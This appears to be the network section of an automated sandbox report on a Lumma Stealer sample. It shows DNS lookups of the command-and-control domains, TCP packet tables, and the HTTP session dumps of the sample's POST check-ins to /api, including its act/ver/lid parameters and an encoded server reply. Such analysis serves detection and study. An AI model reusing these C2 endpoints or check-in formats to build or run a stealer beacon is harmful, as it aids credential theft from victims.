2025-03-05T09:14:20.275524+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49740 | 104.21.31.208 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 09:14:08.594052076 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:08.594094992 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:08.594172955 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:08.597734928 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:08.597744942 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.072818995 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.073657990 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.102112055 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.102148056 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.102571964 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.153459072 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.429481030 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.429481030 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.429666042 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533632040 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533691883 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533744097 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533746958 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.533765078 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533808947 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.533813953 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533878088 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.533917904 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.595477104 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.595477104 CET | 49733 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.595500946 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.595510960 CET | 443 | 49733 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.700053930 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.700104952 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:09.700167894 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.700592995 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:09.700602055 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.195939064 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.196038008 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.197279930 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.197285891 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.197514057 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.198756933 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.198788881 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.198817015 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.677723885 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.677758932 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.677826881 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.677836895 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678112984 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678139925 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678168058 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678179026 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.678184986 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678205967 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.678237915 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678277016 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.678281069 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678646088 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.678694963 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.678699017 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.731522083 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.731540918 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768151045 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768182039 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768205881 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768224001 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.768234968 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768274069 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.768481016 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768526077 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.768574953 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.768585920 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.768604040 CET | 49734 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.768613100 CET | 443 | 49734 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.923909903 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.923938036 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:10.924025059 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.924309015 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:10.924324036 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:11.400680065 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:11.400799990 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:11.402266026 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:11.402275085 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:11.402540922 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:11.403810978 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:11.403942108 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:11.403975964 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:11.404026985 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:11.404036045 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:12.247270107 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:12.247360945 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:12.247431993 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:12.248457909 CET | 49735 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:12.248476028 CET | 443 | 49735 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:12.534950972 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:12.535003901 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:12.535082102 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:12.535535097 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:12.535543919 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.015903950 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.016025066 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.017390013 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.017402887 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.017648935 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.018889904 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.019025087 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.019062996 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.738018036 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.738091946 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.738140106 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.738325119 CET | 49736 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.738343000 CET | 443 | 49736 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.912997961 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.913055897 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:13.913140059 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.913392067 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:13.913408041 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:14.404454947 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:14.404588938 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:14.405802965 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:14.405812979 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:14.406040907 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:14.407179117 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:14.407294035 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:14.407327890 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:14.407396078 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
Mar 5, 2025 09:14:14.407404900 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:15.108345032 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:15.108427048 CET | 443 | 49737 | 104.21.31.208 | 192.168.2.4
Mar 5, 2025 09:14:15.108529091 CET | 49737 | 443 | 192.168.2.4 | 104.21.31.208
                                                                            Mar 5, 2025 09:14:15.109256983 CET49737443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:15.109285116 CET44349737104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:15.706163883 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:15.706207037 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:15.706391096 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:15.706834078 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:15.706845999 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.201523066 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.201597929 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.202799082 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.202809095 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.203069925 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.205760956 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.205845118 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.205873013 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.711846113 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.711922884 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:16.712059975 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.712214947 CET49738443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:16.712235928 CET44349738104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.241878033 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.241924047 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.242331028 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.242331028 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.242362976 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.725066900 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.725239992 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.727807045 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.727821112 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.728028059 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.730221033 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.731780052 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.731823921 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.731937885 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.731961012 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.732047081 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732095957 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.732196093 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732220888 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.732523918 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732542992 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.732671976 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732701063 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.732707024 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732834101 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.732861996 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.742897987 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.743057966 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.743083000 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.743098974 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.743110895 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.743119001 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.743205070 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.743232012 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.743261099 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.747878075 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:17.747983932 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:17.747999907 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.333689928 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.333956003 CET44349739104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.334415913 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.334415913 CET49739443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.362485886 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.362521887 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.362746954 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.363075018 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.363090038 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.835403919 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.835557938 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.836910009 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.836921930 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.837150097 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:19.838463068 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.838479042 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:19.838529110 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:20.275473118 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:20.275582075 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:20.275698900 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:20.275845051 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:20.275891066 CET44349740104.21.31.208192.168.2.4
                                                                            Mar 5, 2025 09:14:20.275924921 CET49740443192.168.2.4104.21.31.208
                                                                            Mar 5, 2025 09:14:20.275940895 CET44349740104.21.31.208192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 09:14:08.552721024 CET | 58036 | 53 | 192.168.2.4 | 1.1.1.1
Mar 5, 2025 09:14:08.565690994 CET | 53 | 58036 | 1.1.1.1 | 192.168.2.4
Mar 5, 2025 09:14:08.569261074 CET | 56573 | 53 | 192.168.2.4 | 1.1.1.1
Mar 5, 2025 09:14:08.588639021 CET | 53 | 56573 | 1.1.1.1 | 192.168.2.4
Mar 5, 2025 09:15:14.987674952 CET | 50316 | 53 | 192.168.2.4 | 1.1.1.1
Mar 5, 2025 09:15:14.995368004 CET | 53 | 50316 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 5, 2025 09:14:08.552721024 CET | 192.168.2.4 | 1.1.1.1 | 0xe4d2 | Standard query (0) | gadgethgfub.icu | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:14:08.569261074 CET | 192.168.2.4 | 1.1.1.1 | 0x5d9b | Standard query (0) | explorebieology.run | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:15:14.987674952 CET | 192.168.2.4 | 1.1.1.1 | 0xa033 | Standard query (0) | tse1.mm.bing.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 5, 2025 09:14:08.565690994 CET | 1.1.1.1 | 192.168.2.4 | 0xe4d2 | Name error (3) | gadgethgfub.icu | none | none | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:14:08.588639021 CET | 1.1.1.1 | 192.168.2.4 | 0x5d9b | No error (0) | explorebieology.run | | 104.21.31.208 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:14:08.588639021 CET | 1.1.1.1 | 192.168.2.4 | 0x5d9b | No error (0) | explorebieology.run | | 172.67.179.246 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:15:14.995368004 CET | 1.1.1.1 | 192.168.2.4 | 0xa033 | No error (0) | tse1.mm.bing.net | mm-mm.bing.net.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 5, 2025 09:15:14.995368004 CET | 1.1.1.1 | 192.168.2.4 | 0xa033 | No error (0) | mm-mm.bing.net.trafficmanager.net | ax-0001.ax-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Mar 5, 2025 09:15:14.995368004 CET | 1.1.1.1 | 192.168.2.4 | 0xa033 | No error (0) | ax-0001.ax-msedge.net | | 150.171.28.10 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 09:15:14.995368004 CET | 1.1.1.1 | 192.168.2.4 | 0xa033 | No error (0) | ax-0001.ax-msedge.net | | 150.171.27.10 | A (IP address) | IN (0x0001) | false
                                                                            • explorebieology.run
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 104.21.31.208 | 443 | 7280 | C:\Users\user\Desktop\JqGBbm7.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:14:09 UTC | 266 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: explorebieology.run
2025-03-05 08:14:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-03-05 08:14:09 UTC | 554 | IN | HTTP/1.1 403 Forbidden
Date: Wed, 05 Mar 2025 08:14:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwZOFV9zTQ3%2BQTpnKiSI9XoZ65G2LSO67joJ0Xo2LPZjHOohStq4VSc8LYXqimAawSYGXi4Ia5Fd28aSZO3MYz2z5cyj%2BWXjqUbHskFeaL7rRx6LJkT07XiLJdrbXkngcROJzUDX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b8287d39783ee0-EWR
2025-03-05 08:14:09 UTC | 815 | IN | Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2025-03-05 08:14:09 UTC | 1369 | IN | Data Ascii: es/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('c
2025-03-05 08:14:09 UTC | 1369 | IN | Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="
2025-03-05 08:14:09 UTC | 1003 | IN | Data Ascii: f-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performan
2025-03-05 08:14:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 104.21.31.208 | 443 | 7280 | C:\Users\user\Desktop\JqGBbm7.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 08:14:10 UTC | 356 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: __cf_mw_byp=jbHAwUcAdytIGQtFfN58sTgYZjo1qwz1caz7LgJSFBs-1741162449-0.0.1.1-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 55
Host: explorebieology.run
2025-03-05 08:14:10 UTC | 55 | OUT | Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 31 76 4a 49 76 6b 2d 2d 6d 69 78 2d 6c 61 62 73 2d 32 30 6b 26 6a 3d
Data Ascii: act=receive_message&ver=4.0&lid=1vJIvk--mix-labs-20k&j=
2025-03-05 08:14:10 UTC | 823 | IN | HTTP/1.1 200 OK
Date: Wed, 05 Mar 2025 08:14:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F%2B5XzBhFf%2FsjBdf%2F84nieXBlxXSzpXhTwjTFG8SAhihaZBI%2F%2BNKOlziBxehlKeW2CVHRATfByz%2B6fZ3hniimTvyy9pEmMIBT7aW%2F5xgbebHLze9CCqS1Ayej5bihZy0SMTtRYEBP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 91b828822bbc75e1-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1638&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1047&delivery_rate=1743283&cwnd=192&unsent_bytes=0&cid=0e40f383dca8766e&ts=486&x=0"
                                                                            Data Ascii: GlrkLG5h6M32KHL8eo8lAmYLLn5cMfQaLmNbIXk+8aFLb/U9Um2V/I88rvxGiz1bWmY6P0Qp8Q97cxc5aQ79iXde3EwaQdDd+gxG8Gb7OT5+Fw5+WBXwJhZuEjBVHqCEGlp4WBJE9IDWWWrUT7JAAnovInJUKfQSAldbLUE6wZVXZuwUXnG85f4cZvxKiy0TWyICRiU0oQ7SRytlaR6FrHsnzGFSbcX8jzx68DafJS52Ix5mUB3AMgp/KyVRDuG
                                                                            2025-03-05 08:14:10 UTC1369INData Raw: 33 33 38 36 0d 0a 43 49 47 4e 61 50 7a 70 71 53 43 6e 67 4c 67 35 7a 50 77 6c 70 4b 76 6d 5a 4d 33 4c 45 4c 42 70 4e 2b 4d 6e 2b 43 45 4c 63 57 76 73 31 4a 6b 4d 61 4f 31 70 59 56 4d 46 76 47 70 4d 2f 4d 5a 30 4f 72 49 55 47 59 70 45 45 54 6b 44 31 6e 4f 34 77 64 73 52 36 6d 77 55 79 5a 67 63 53 45 6d 77 70 69 41 6f 65 58 79 63 35 56 54 62 31 72 58 39 2b 77 44 52 6d 62 65 6a 42 2b 7a 31 54 79 47 4c 53 49 47 4e 61 6e 7a 5a 32 64 56 69 70 44 6d 64 4c 64 67 6c 4a 4d 38 44 6b 65 31 72 63 45 48 70 46 2b 4d 48 69 64 47 37 51 4e 72 4d 56 4b 68 49 7a 4c 6b 35 77 41 66 51 43 41 6d 73 2f 4f 52 30 6d 77 59 6c 57 57 38 30 45 54 68 44 31 6e 4f 36 77 4e 70 42 57 72 78 46 61 64 68 38 4f 41 6e 42 30 77 54 63 61 4e 77 39 4d 56 47 4b 5a 78 53 64 47 69 54 77 33 63 65 6a 4d
